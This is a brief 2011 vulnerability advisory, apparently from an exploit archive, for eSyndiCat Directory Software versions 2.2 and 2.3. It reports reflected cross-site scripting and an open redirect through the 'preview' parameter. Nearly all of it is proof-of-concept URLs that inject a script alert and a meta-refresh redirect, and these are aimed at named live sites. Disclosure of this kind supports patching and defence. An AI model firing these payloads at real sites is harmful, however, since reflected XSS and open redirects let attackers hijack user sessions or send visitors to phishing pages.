eSyndiCat Directory Software ( preview= ) version 2.2 and 2.3 - Cross-Site Scripting ( XSS ) & Redirect http://www.esyndicat.com 30 - 01 - 2011 Avram Marius ( d3v1l ) http://twitter.com/securityshell - http://security-sh3ll.blogspot.com -------------------------------------------------------------------------- Poc: 1 XSS & Redirect on v.2.3 http://www.esyndicat.com/demo/?preview="><script>alert('XSS')</script> http://www.esyndicat.com/demo/?preview="><meta http-equiv="Refresh" content="0;url=http://www.google.com/"> "" -------------------------------------------------------------------------- Poc: 2 XSS & Redirect on v.2.2 http://ekedai.net/date/2008/08/?preview="><script>alert('XSS')</script> http://ekedai.net/date/2008/08/?preview="><meta http-equiv="Refresh" content="0;url=http://www.google.com/"> "" --------------------------------------------------------------------------